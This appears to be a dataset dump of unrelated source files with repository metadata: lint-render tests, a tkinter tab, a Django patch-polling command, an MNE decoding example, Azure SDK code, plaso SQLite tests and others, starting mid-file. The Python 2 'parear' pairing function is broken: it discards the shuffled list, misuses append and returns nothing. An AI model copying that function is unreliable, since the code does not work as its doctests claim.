ctx.znake.static.packages = ['my_package', 'my_other_package']
getattr(ctx.znake.static, tool).flags = ['--my-flag', '--my-other-flag']
return ctx
def test_flake8(self):
ctx = self.get_ctx('flake8')
result = render_flake8_check(ctx)
assert 'flake8' in result
assert '--my-flag --my-other-flag' in result
assert 'my_package my_other_package' in result
def test_isort(self):
ctx = self.get_ctx('isort')
result = _render_isort(ctx, '--EXTRA')
assert 'isort --recursive --EXTRA' in result
assert '--my-flag --my-other-flag' in result
assert 'my_package my_other_package' in result
def test_pydocstyle(self):
ctx = self.get_ctx('pydocstyle')
result = render_pydocstyle_check(ctx)
assert 'pydocstyle' in result
assert '--my-flag --my-other-flag' in result
assert 'my_package my_other_package' in result
def test_yapf(self):
ctx = self.get_ctx('yapf')
result = _render_yapf(ctx, '--EXTRA')
assert 'yapf -p --recursive --EXTRA' in result
assert '--my-flag --my-other-flag' in result
assert 'my_package my_other_package' in result
|
[
"per.bohlin@zenterio.com"
] |
per.bohlin@zenterio.com
|
a704c7629480555065e3767614ff66caab4f1096
|
bacabd549ca67204bd3ec22f0f9020a4287aa6c5
|
/ui/dispatcher_tab.py
|
87144b13fd78c80105599462550a5804ad38e78a
|
[] |
no_license
|
gladiopeace/csc-manager-ui
|
5b8b642695742e906c779bbb18759084ed4791a9
|
ec7660b91aed0f8512183b147cb49994c925bc41
|
refs/heads/master
| 2023-06-26T17:22:31.434146
| 2021-07-23T13:32:33
| 2021-07-23T13:32:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 777
|
py
|
import logging
import tkinter
class DispatcherTab(tkinter.Frame):
def __init__(self, parent, in_callback=None, out_callback=None):
self.logger = logging.getLogger(f'{self.__class__.__name__}', )
self.parent = parent
self.in_callback = in_callback
self.out_callback = out_callback
tkinter.Frame.__init__(self, parent)
def on_visible_in(self, parent, id, str):
self.logger.debug("on_visible_in: parent=%s, ID=%s, str=%s", parent, id, str)
if self.in_callback is not None:
self.in_callback()
def on_visible_out(self, parent, id, str):
self.logger.debug("on_visible_in: parent=%s, ID=%s, str=%s", parent, id, str)
if self.out_callback is not None:
self.out_callback()
|
[
"bohdan.shlikhutka@gmail.com"
] |
bohdan.shlikhutka@gmail.com
|
fa9a485adbdcf00e88ce9e816a00db9e0b6e9d2a
|
bdb1c323968cd9d5441a187a29ed7e25a2e4f07e
|
/cp0/people/management/commands/UPdate.py
|
e42d81d517445ea10d217cff37e1280e3c12f9e1
|
[] |
no_license
|
liangzhaowang/automation_system
|
beee351dd9f09a51e2b81617ac5bee63023ea9b8
|
f77ef433c2366253dc9d9fdb7c54911cb38ed3e8
|
refs/heads/master
| 2022-02-19T11:07:44.047000
| 2019-09-23T02:16:00
| 2019-09-23T02:16:00
| 209,732,359
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,650
|
py
|
from django.core.management.base import BaseCommand
import json
import time
from people.models import bxtp_m
from people.models import bxtp_o
from Patches import Patches
from people.models import bkc_m
from people.models import bkc_o
from data.models import Task
class Command(BaseCommand):
def handle(self,*args, **options):
while True:
options_time = time.strftime("%Y-%m-%d %H:%M:%S")
print "======================================="
print "Now time is: {0}".format(str(options_time))
self.checkdata()
print "Please wait 30 seconds for next update "
print "======================================="
time.sleep(30)
def checkdata(self):
Bkc_m = bkc_m.objects.all()
Bkc_o = bkc_o.objects.all()
for i in Bkc_m:
id = i.id
if i.eb =='':
tasks_id = i.task
if tasks_id:
tasks = Task.objects.get(id=tasks_id)
config_id = str(tasks.test_config)
if (json.load(open("./data/data/test_configs/" + config_id)).has_key('base_build')):
new_eb = "https://buildbot.sh.intel.com/absp/builders/bxtp_ivi_m-engineering/builds/"+json.load(open("./data/data/test_configs/" + config_id))['build'][0]
print "update eblink({0}).subject to {1}".format(str(i.eb), new_eb)
bkc_m.objects.filter(id=id).update(eb=new_eb)
for i in Bkc_o:
id = i.id
if i.eb =='':
tasks_id = i.task
if tasks_id:
tasks = Task.objects.get(id=tasks_id)
config_id = str(tasks.test_config)
if (json.load(open("./data/data/test_configs/" + config_id)).has_key('base_build')):
new_eb = "https://buildbot.sh.intel.com/absp/builders/master-engineering/builds/"+json.load(open("./data/data/test_configs/" + config_id))['build'][0]
print "update eblink({0}).subject to {1}".format(str(i.eb), new_eb)
bkc_o.objects.filter(id=id).update(eb=new_eb)
all = bxtp_m.objects.all()
for i in all:
id = i.id
data = i.patch.split("/")[5]
p = Patches(data)
if len(p.content):
owner = str(p.owner)
subject = str(p.subject)
status = str(p.status)
track = str(p.track_id)
if i.owner != owner:
print "update patch({0}).owner to {1}".format(str(i.id),owner)
bxtp_m.objects.filter(id=id).update(owner=owner)
if i.subject != subject:
print "update patch({0}).subject to {1}".format(str(i.id),subject)
bxtp_m.objects.filter(id=id).update(subject=subject)
if i.status != status:
print "update patch({0}).status to {1}".format(str(i.id),status)
bxtp_m.objects.filter(id=id).update(status=status)
if i.track != track:
print "update patch({0}).track to {1}".format(str(i.id),track)
bxtp_m.objects.filter(id=id).update(track=track)
else:
print 'Patch_M(%d) error' % id
alls = bxtp_o.objects.all()
for i in alls:
id = i.id
data = i.patch.split("/")[5]
p = Patches(data)
if len(p.content):
owner = str(p.owner)
subject = str(p.subject)
status = str(p.status)
track = str(p.track_id)
if i.owner != owner:
print "update patch({0}).owner to {1}".format(str(i.id),owner)
bxtp_o.objects.filter(id=id).update(owner=owner)
if i.subject != subject:
print "update patch({0}).subject to {1}".format(str(i.id),subject)
bxtp_o.objects.filter(id=id).update(subject=subject)
if i.status != status:
print "update patch({0}).status to {1}".format(str(i.id),status)
bxtp_o.objects.filter(id=id).update(status=status)
if i.track != track:
print "update patch({0}).track to {1}".format(str(i.id),track)
bxtp_o.objects.filter(id=id).update(track=track)
else:
print 'Patch_O(%d) error' % id
|
[
"zhaowangx.liang@intel.com"
] |
zhaowangx.liang@intel.com
|
58204fab93085a4af72d6ba4ffef814213fd27a0
|
a9243f735f6bb113b18aa939898a97725c358a6d
|
/0.14/_downloads/plot_decoding_time_generalization_conditions.py
|
98b29ed251d7f7287579cc2c0e3049cdb118be34
|
[] |
permissive
|
massich/mne-tools.github.io
|
9eaf5edccb4c35831400b03278bb8c2321774ef2
|
95650593ba0eca4ff8257ebcbdf05731038d8d4e
|
refs/heads/master
| 2020-04-07T08:55:46.850530
| 2019-09-24T12:26:02
| 2019-09-24T12:26:02
| 158,233,630
| 0
| 0
|
BSD-3-Clause
| 2018-11-19T14:06:16
| 2018-11-19T14:06:16
| null |
UTF-8
|
Python
| false
| false
| 2,991
|
py
|
"""
=========================================================================
Decoding sensor space data with generalization across time and conditions
=========================================================================
This example runs the analysis described in [1]_. It illustrates how one can
fit a linear classifier to identify a discriminatory topography at a given time
instant and subsequently assess whether this linear model can accurately
predict all of the time samples of a second set of conditions.
References
----------
.. [1] King & Dehaene (2014) 'Characterizing the dynamics of mental
representations: the temporal generalization method', Trends In
Cognitive Sciences, 18(4), 203-210. doi: 10.1016/j.tics.2014.01.002.
"""
# Authors: Jean-Remi King <jeanremi.king@gmail.com>
# Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Denis Engemann <denis.engemann@gmail.com>
#
# License: BSD (3-clause)
import numpy as np
import mne
from mne.datasets import sample
from mne.decoding import GeneralizationAcrossTime
print(__doc__)
# Preprocess data
data_path = sample.data_path()
# Load and filter data, set up epochs
raw_fname = data_path + '/MEG/sample/sample_audvis_filt-0-40_raw.fif'
events_fname = data_path + '/MEG/sample/sample_audvis_filt-0-40_raw-eve.fif'
raw = mne.io.read_raw_fif(raw_fname, preload=True)
picks = mne.pick_types(raw.info, meg=True, exclude='bads') # Pick MEG channels
raw.filter(1, 30, method='fft') # Band pass filtering signals
events = mne.read_events(events_fname)
event_id = {'AudL': 1, 'AudR': 2, 'VisL': 3, 'VisR': 4}
decim = 2 # decimate to make the example faster to run
epochs = mne.Epochs(raw, events, event_id, -0.050, 0.400, proj=True,
picks=picks, baseline=None, preload=True,
reject=dict(mag=5e-12), decim=decim, verbose=False)
# We will train the classifier on all left visual vs auditory trials
# and test on all right visual vs auditory trials.
# In this case, because the test data is independent from the train data,
# we test the classifier of each fold and average the respective predictions.
# Define events of interest
triggers = epochs.events[:, 2]
viz_vs_auditory = np.in1d(triggers, (1, 2)).astype(int)
gat = GeneralizationAcrossTime(predict_mode='mean-prediction', n_jobs=1)
# For our left events, which ones are visual?
viz_vs_auditory_l = (triggers[np.in1d(triggers, (1, 3))] == 3).astype(int)
# To make scikit-learn happy, we converted the bool array to integers
# in the same line. This results in an array of zeros and ones:
print("The unique classes' labels are: %s" % np.unique(viz_vs_auditory_l))
gat.fit(epochs[('AudL', 'VisL')], y=viz_vs_auditory_l)
# For our right events, which ones are visual?
viz_vs_auditory_r = (triggers[np.in1d(triggers, (2, 4))] == 4).astype(int)
gat.score(epochs[('AudR', 'VisR')], y=viz_vs_auditory_r)
gat.plot(title="Temporal Generalization (visual vs auditory): left to right")
|
[
"larson.eric.d@gmail.com"
] |
larson.eric.d@gmail.com
|
05c2a6863ff170102ac029bc54b72165cc024208
|
f66b8a4d5d2f9f9faeb23a2bbbf6524ec49b2051
|
/surreal/__init__.py
|
2d52593edffe3efb913070aa7a4219fbe7fb3203
|
[
"Apache-2.0"
] |
permissive
|
ducandu/surreal
|
237f4188ba270bab7495cb782ed10ee463fe78a7
|
8abfb18538340d50146c9c44f5ecb8a1e7d89ac3
|
refs/heads/master
| 2020-08-01T14:10:00.327798
| 2019-11-09T15:32:13
| 2019-11-09T15:32:13
| 211,018,247
| 6
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,532
|
py
|
# Copyright 2019 ducandu GmbH. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
from surreal.version import __version__
from surreal.makeable import Makeable
from surreal.config import Config
if "SURREAL_HOME" in os.environ:
SURREAL_HOME = os.environ.get("SURREAL_HOME")
else:
SURREAL_HOME = os.path.expanduser('~')
SURREAL_HOME = os.path.join(SURREAL_HOME, ".surreal/")
PATH_EPISODE_LOGS = SURREAL_HOME + "episodes/"
PATH_PREPROCESSING_LOGS = SURREAL_HOME + "preprocessing/"
PATH_SUMMARIES = SURREAL_HOME + "summaries/"
# Create dirs if necessary:
for dir in [SURREAL_HOME, PATH_EPISODE_LOGS, PATH_PREPROCESSING_LOGS, PATH_SUMMARIES]:
if not os.path.exists(dir):
try:
os.makedirs(dir)
except OSError:
pass
__all__ = ["__version__", "Config", "Makeable",
"SURREAL_HOME", "PATH_EPISODE_LOGS", "PATH_PREPROCESSING_LOGS", "PATH_SUMMARIES"
]
|
[
"svenmika1977@gmail.com"
] |
svenmika1977@gmail.com
|
0adbdd2bd8d43634f5c96ccc4a3c8740c82a3216
|
de4da7c45581f72adaf8e328a89cb3d57fe3613f
|
/appengine/olamundo/sorteio.py
|
a6f9e22632289da4d7a3116e0e402b2005a1840c
|
[] |
no_license
|
ramalho/propython
|
2469be7492554762d05f9b0ce5c0dc3a51bd3a18
|
76c2b52755e08d49929cdc2a523db72735240e72
|
refs/heads/master
| 2022-06-01T22:51:07.659074
| 2022-05-22T18:22:21
| 2022-05-22T18:22:21
| 140,458
| 39
| 13
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 872
|
py
|
# coding: utf-8
from random import shuffle
def parear(nomes, embaralhar=True):
u'''Dada uma lista de nomes, garar uma lista de pares ordenados
de nomes, onde:
- cada nome aparece uma vez e apenas uma vez em cada posição
- se existe um par a, b, não existirá o par b, a
Exemplos:
>>> parear(['a', 'b'], embaralhar=False)
[('a', 'b'), ('b', 'a')]
>>> parear(['a', 'b', 'c'], embaralhar=False)
[('a', 'b'), ('b', 'c'), ('c', 'a')]
'''
if embaralhar:
nomes = nomes.shuffle()
primeiro = nomes[0]
pares = []
try:
while True:
pares.append(nomes.pop(0), nomes[0])
except IndexError:
print nomes
print pares
if __name__=='__main__':
from doctest import testmod
testmod()
|
[
"luciano@ramalho.org"
] |
luciano@ramalho.org
|
c79903a6216c94eb3633b54c28d4bdfc5e67a99e
|
fb7efe44f4d9f30d623f880d0eb620f3a81f0fbd
|
/tools/chrome_proxy/integration_tests/chrome_proxy_pagesets/pass_through.py
|
cc1d267d32fd0971958e46cfd6e27da2af5628b2
|
[
"LGPL-2.0-or-later",
"BSD-3-Clause",
"Apache-2.0",
"LGPL-2.0-only",
"MIT",
"LicenseRef-scancode-unknown",
"LicenseRef-scancode-unknown-license-reference",
"LGPL-2.1-only"
] |
permissive
|
wzyy2/chromium-browser
|
2644b0daf58f8b3caee8a6c09a2b448b2dfe059c
|
eb905f00a0f7e141e8d6c89be8fb26192a88c4b7
|
refs/heads/master
| 2022-11-23T20:25:08.120045
| 2018-01-16T06:41:26
| 2018-01-16T06:41:26
| 117,618,467
| 3
| 2
|
BSD-3-Clause
| 2022-11-20T22:03:57
| 2018-01-16T02:09:10
| null |
UTF-8
|
Python
| false
| false
| 1,318
|
py
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from common.chrome_proxy_shared_page_state import ChromeProxySharedPageState
from telemetry.page import page as page_module
from telemetry import story
class PassThroughPage(page_module.Page):
"""
A test page for the chrome proxy pass-through tests.
"""
def __init__(self, url, page_set):
super(PassThroughPage, self).__init__(url=url, page_set=page_set,
shared_page_state_class=ChromeProxySharedPageState)
def RunNavigateSteps(self, action_runner):
super(PassThroughPage, self).RunNavigateSteps(action_runner)
action_runner.ExecuteJavaScript('''
(function() {
var request = new XMLHttpRequest();
request.open("GET", {{ url }});
request.setRequestHeader("Chrome-Proxy-Accept-Transform", "identity");
request.send(null);
})();''', url=self.url)
action_runner.Wait(1)
class PassThroughStorySet(story.StorySet):
""" Chrome proxy test sites """
def __init__(self):
super(PassThroughStorySet, self).__init__()
urls_list = [
'http://check.googlezip.net/image.png',
]
for url in urls_list:
self.AddStory(PassThroughPage(url, self))
|
[
"jacob-chen@iotwrt.com"
] |
jacob-chen@iotwrt.com
|
e056bd156b04aa2a41d8cfda5e58af59dbed6b8c
|
4c514345b4759ed4d17f48565ae66dbd7313a0e8
|
/database/match_query.py
|
5e7c6e4ee818c1e183fa2b609979a449e1133e02
|
[
"MIT"
] |
permissive
|
csteward24/the-blue-alliance
|
a6f193176b5c3f3eadb73126d14d06ce299c4185
|
cb3c5ce9078983306e6c83067ae62f5848ffe290
|
refs/heads/master
| 2020-12-11T05:45:15.029275
| 2016-03-11T19:49:32
| 2016-03-11T19:49:32
| 53,530,477
| 1
| 0
| null | 2016-03-09T20:45:46
| 2016-03-09T20:45:46
| null |
UTF-8
|
Python
| false
| false
| 1,616
|
py
|
from google.appengine.ext import ndb
from database.database_query import DatabaseQuery
from models.event import Event
from models.match import Match
class EventMatchesQuery(DatabaseQuery):
CACHE_VERSION = 0
CACHE_KEY_FORMAT = 'event_matches_{}' # (event_key)
def __init__(self, event_key):
self._query_args = (event_key, )
@ndb.tasklet
def _query_async(self):
event_key = self._query_args[0]
matches = yield Match.query(Match.event == ndb.Key(Event, event_key)).fetch_async()
raise ndb.Return(matches)
class TeamEventMatchesQuery(DatabaseQuery):
CACHE_VERSION = 0
CACHE_KEY_FORMAT = 'team_event_matches_{}_{}' # (team_key, event_key)
def __init__(self, team_key, event_key):
self._query_args = (team_key, event_key, )
@ndb.tasklet
def _query_async(self):
team_key = self._query_args[0]
event_key = self._query_args[1]
matches = yield Match.query(
Match.team_key_names == team_key,
Match.event == ndb.Key(Event, event_key)).fetch_async()
raise ndb.Return(matches)
class TeamYearMatchesQuery(DatabaseQuery):
CACHE_VERSION = 0
CACHE_KEY_FORMAT = 'team_year_matches_{}_{}' # (team_key, year)
def __init__(self, team_key, year):
self._query_args = (team_key, year, )
@ndb.tasklet
def _query_async(self):
team_key = self._query_args[0]
year = self._query_args[1]
matches = yield Match.query(
Match.team_key_names == team_key,
Match.year == year).fetch_async()
raise ndb.Return(matches)
|
[
"fang.eugene@gmail.com"
] |
fang.eugene@gmail.com
|
47489d28c2824bf881262a0cb690632b0f06a466
|
6eb56f2e3f14f2373be07fe95b1c6fedf1e2d49f
|
/month04/Django/my_django_test/my_test_site/my_test_site/wsgi.py
|
6f99386c8bf33243c58777fcefe3b43edecaa629
|
[
"Apache-2.0"
] |
permissive
|
chaofan-zheng/python_leanring_code
|
fe22b0370cadebf7456477269aff4a35cef0eb41
|
0af44ff39b9ded2c1d2cc96c6d356d21170ac04d
|
refs/heads/main
| 2023-02-28T07:56:46.457552
| 2021-02-10T15:08:33
| 2021-02-10T15:08:33
| 323,584,115
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 401
|
py
|
"""
WSGI config for my_test_site project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'my_test_site.settings')
application = get_wsgi_application()
|
[
"417355570@qq.com"
] |
417355570@qq.com
|
d70c588617cd936f303f45bd05a8f14dd95db981
|
9df2fb0bc59ab44f026b0a2f5ef50c72b2fb2ceb
|
/sdk/containerservice/azure-mgmt-containerservice/azure/mgmt/containerservice/v2022_05_02_preview/operations/_trusted_access_roles_operations.py
|
63b63ca700ec5026c217f4203ddfdc330e525f96
|
[
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
openapi-env-test/azure-sdk-for-python
|
b334a2b65eeabcf9b7673879a621abb9be43b0f6
|
f61090e96094cfd4f43650be1a53425736bd8985
|
refs/heads/main
| 2023-08-30T14:22:14.300080
| 2023-06-08T02:53:04
| 2023-06-08T02:53:04
| 222,384,897
| 1
| 0
|
MIT
| 2023-09-08T08:38:48
| 2019-11-18T07:09:24
|
Python
|
UTF-8
|
Python
| false
| false
| 7,294
|
py
|
# pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Iterable, Optional, TypeVar
import urllib.parse
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
from ..._serialization import Serializer
from .._vendor import _convert_request, _format_url_section
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_list_request(location: str, subscription_id: str, **kwargs: Any) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: str = kwargs.pop("api_version", _params.pop("api-version", "2022-05-02-preview"))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/providers/Microsoft.ContainerService/locations/{location}/trustedAccessRoles",
) # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str", min_length=1),
"location": _SERIALIZER.url("location", location, "str", min_length=1),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
class TrustedAccessRolesOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.containerservice.v2022_05_02_preview.ContainerServiceClient`'s
:attr:`trusted_access_roles` attribute.
"""
models = _models
def __init__(self, *args, **kwargs):
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace
def list(self, location: str, **kwargs: Any) -> Iterable["_models.TrustedAccessRole"]:
"""List supported trusted access roles.
List supported trusted access roles.
:param location: The name of Azure region. Required.
:type location: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either TrustedAccessRole or the result of cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.containerservice.v2022_05_02_preview.models.TrustedAccessRole]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: str = kwargs.pop("api_version", _params.pop("api-version", "2022-05-02-preview"))
cls: ClsType[_models.TrustedAccessRoleListResult] = kwargs.pop("cls", None)
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
location=location,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
# make call to next link with the client's api-version
_parsed_next_link = urllib.parse.urlparse(next_link)
_next_request_params = case_insensitive_dict(
{
key: [urllib.parse.quote(v) for v in value]
for key, value in urllib.parse.parse_qs(_parsed_next_link.query).items()
}
)
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest(
"GET", urllib.parse.urljoin(next_link, _parsed_next_link.path), params=_next_request_params
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("TrustedAccessRoleListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem) # type: ignore
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
_stream = False
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(get_next, extract_data)
list.metadata = {
"url": "/subscriptions/{subscriptionId}/providers/Microsoft.ContainerService/locations/{location}/trustedAccessRoles"
}
|
[
"noreply@github.com"
] |
openapi-env-test.noreply@github.com
|
52e6250f9fd41a90fb895ac16801170303863407
|
6be29c75fe23bf38ac2df4125242e767fb37d41c
|
/tests/parsers/sqlite_plugins/interface.py
|
c0f3af0d7986a8e2dc78f12799da84559dca1a96
|
[
"Apache-2.0"
] |
permissive
|
Laxman-SM/plaso
|
579c7954b2622368427740e2b5687bf2efe249e7
|
bec7b974ec9c2967be58fc704afca936591e46d3
|
refs/heads/master
| 2021-01-22T05:32:59.383909
| 2017-05-26T04:15:29
| 2017-05-26T04:15:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,497
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tests for the SQLite plugin interface."""
import sys
import unittest
from plaso.containers import time_events
from plaso.lib import eventdata
from plaso.lib import timelib
from plaso.parsers import sqlite
from plaso.parsers.sqlite_plugins import interface
from tests import test_lib as shared_test_lib
from tests.parsers.sqlite_plugins import test_lib
class TestSQLitePlugin(interface.SQLitePlugin):
"""Convenience class for a test SQLite plugin."""
NAME = u'test'
QUERIES = [(
u'SELECT Field1, Field2, Field3 FROM MyTable', u'ParseMyTableRow')]
REQUIRED_TABLES = frozenset([u'MyTable'])
SCHEMAS = [
{u'MyTable':
u'CREATE TABLE "MyTable" ( `Field1` TEXT, `Field2` INTEGER, '
u'`Field3` BLOB )'}]
def __init__(self):
"""Initializes SQLite plugin."""
super(TestSQLitePlugin, self).__init__()
self.results = []
def ParseMyTableRow(self, parser_mediator, row, **unused_kwargs):
"""Parses a MyTable row.
Args:
parser_mediator: A parser mediator object (instance of ParserMediator).
row: The row resulting from the query.
"""
file_entry = parser_mediator.GetFileEntry()
path_spec = file_entry.path_spec
location = path_spec.location
from_wal = location.endswith(u'-wal')
# Note that pysqlite does not accept a Unicode string in row['string'] and
# will raise "IndexError: Index must be int or string".
# Also, Field3 needs to be converted to a string if Python 2 is used
# because it is a read-write buffer.
field3 = row['Field3']
if sys.version_info[0] < 3:
field3 = str(field3)
self.results.append(((row['Field1'], row['Field2'], field3), from_wal))
event = time_events.TimestampEvent(
timelib.Timestamp.NONE_TIMESTAMP, eventdata.EventTimestamp.NOT_A_TIME,
data_type=u'fake')
event.field1 = row['Field1']
event.field2 = row['Field2']
event.field3 = field3
event.from_wal = location.endswith(u'-wal')
parser_mediator.ProduceEvent(event)
class SQLiteInterfaceTest(test_lib.SQLitePluginTestCase):
"""Tests for the SQLite plugin interface."""
@shared_test_lib.skipUnlessHasTestFile([u'wal_database.db'])
@shared_test_lib.skipUnlessHasTestFile([u'wal_database.db-wal'])
def testProcessWithWAL(self):
"""Tests the Process function on a database with WAL file."""
plugin_object = TestSQLitePlugin()
cache = sqlite.SQLiteCache()
wal_file = self._GetTestFilePath([u'wal_database.db-wal'])
self._ParseDatabaseFileWithPlugin(
[u'wal_database.db'], plugin_object, cache=cache, wal_path=wal_file)
expected_results = [
((u'Committed Text 1', 1, b'None'), False),
((u'Committed Text 2', 2, b'None'), False),
((u'Deleted Text 1', 3, b'None'), False),
((u'Committed Text 3', 4, b'None'), False),
((u'Committed Text 4', 5, b'None'), False),
((u'Deleted Text 2', 6, b'None'), False),
((u'Committed Text 5', 7, b'None'), False),
((u'Committed Text 6', 8, b'None'), False),
((u'Committed Text 7', 9, b'None'), False),
((u'Unhashable Row 1', 10, b'Binary Text!\x01\x02\x03'), False),
((u'Modified Committed Text 3', 4, b'None'), True),
((u'Unhashable Row 2', 11, b'More Binary Text!\x01\x02\x03'), True),
((u'New Text 1', 12, b'None'), True),
((u'New Text 2', 13, b'None'), True)]
self.assertEqual(expected_results, plugin_object.results)
@shared_test_lib.skipUnlessHasTestFile([u'wal_database.db'])
def testProcessWithoutWAL(self):
"""Tests the Process function on a database without WAL file."""
plugin_object = TestSQLitePlugin()
cache = sqlite.SQLiteCache()
self._ParseDatabaseFileWithPlugin(
[u'wal_database.db'], plugin_object, cache=cache)
expected_results = [
((u'Committed Text 1', 1, b'None'), False),
((u'Committed Text 2', 2, b'None'), False),
((u'Deleted Text 1', 3, b'None'), False),
((u'Committed Text 3', 4, b'None'), False),
((u'Committed Text 4', 5, b'None'), False),
((u'Deleted Text 2', 6, b'None'), False),
((u'Committed Text 5', 7, b'None'), False),
((u'Committed Text 6', 8, b'None'), False),
((u'Committed Text 7', 9, b'None'), False),
((u'Unhashable Row 1', 10, b'Binary Text!\x01\x02\x03'), False)]
self.assertEqual(expected_results, plugin_object.results)
@shared_test_lib.skipUnlessHasTestFile([u'wal_database.db'])
@shared_test_lib.skipUnlessHasTestFile([u'wal_database.db-wal'])
def testSchemaMatching(self):
"""Tests the Schema matching capabilities."""
plugin_object = TestSQLitePlugin()
cache = sqlite.SQLiteCache()
# Test matching schema.
storage_writer = self._ParseDatabaseFileWithPlugin(
[u'wal_database.db'], plugin_object, cache=cache)
self.assertTrue(storage_writer.events)
for event in storage_writer.events:
self.assertTrue(event.schema_match)
# Test schema change with WAL.
wal_file = self._GetTestFilePath([u'wal_database.db-wal'])
storage_writer = self._ParseDatabaseFileWithPlugin(
[u'wal_database.db'], plugin_object, cache=cache, wal_path=wal_file)
self.assertTrue(storage_writer.events)
for event in storage_writer.events:
if event.from_wal:
self.assertFalse(event.schema_match)
else:
self.assertTrue(event.schema_match)
# Add schema change from WAL file and test again.
plugin_object.SCHEMAS.append(
{u'MyTable':
u'CREATE TABLE "MyTable" ( `Field1` TEXT, `Field2` INTEGER, `Field3` '
u'BLOB , NewField TEXT)',
u'NewTable':
u'CREATE TABLE NewTable(NewTableField1 TEXT, NewTableField2 TEXT)'})
storage_writer = self._ParseDatabaseFileWithPlugin(
[u'wal_database.db'], plugin_object, cache=cache, wal_path=wal_file)
self.assertTrue(storage_writer.events)
for event in storage_writer.events:
self.assertTrue(event.schema_match)
# Test without original schema.
del plugin_object.SCHEMAS[0]
storage_writer = self._ParseDatabaseFileWithPlugin(
[u'wal_database.db'], plugin_object, cache=cache, wal_path=wal_file)
self.assertTrue(storage_writer.events)
for event in storage_writer.events:
if event.from_wal:
self.assertTrue(event.schema_match)
else:
self.assertFalse(event.schema_match)
if __name__ == '__main__':
unittest.main()
|
[
"joachim.metz@gmail.com"
] |
joachim.metz@gmail.com
|
8e057d2ce2408c7882a9090ddf70294e23500b13
|
65a32b8a8a97c126843d2cfe79c43193ac2abc23
|
/chapter16/fib_test_2.py
|
c722f4d40ff1ba55c39a6f1db4cb394a86e1710c
|
[] |
no_license
|
zhuyuedlut/advanced_programming
|
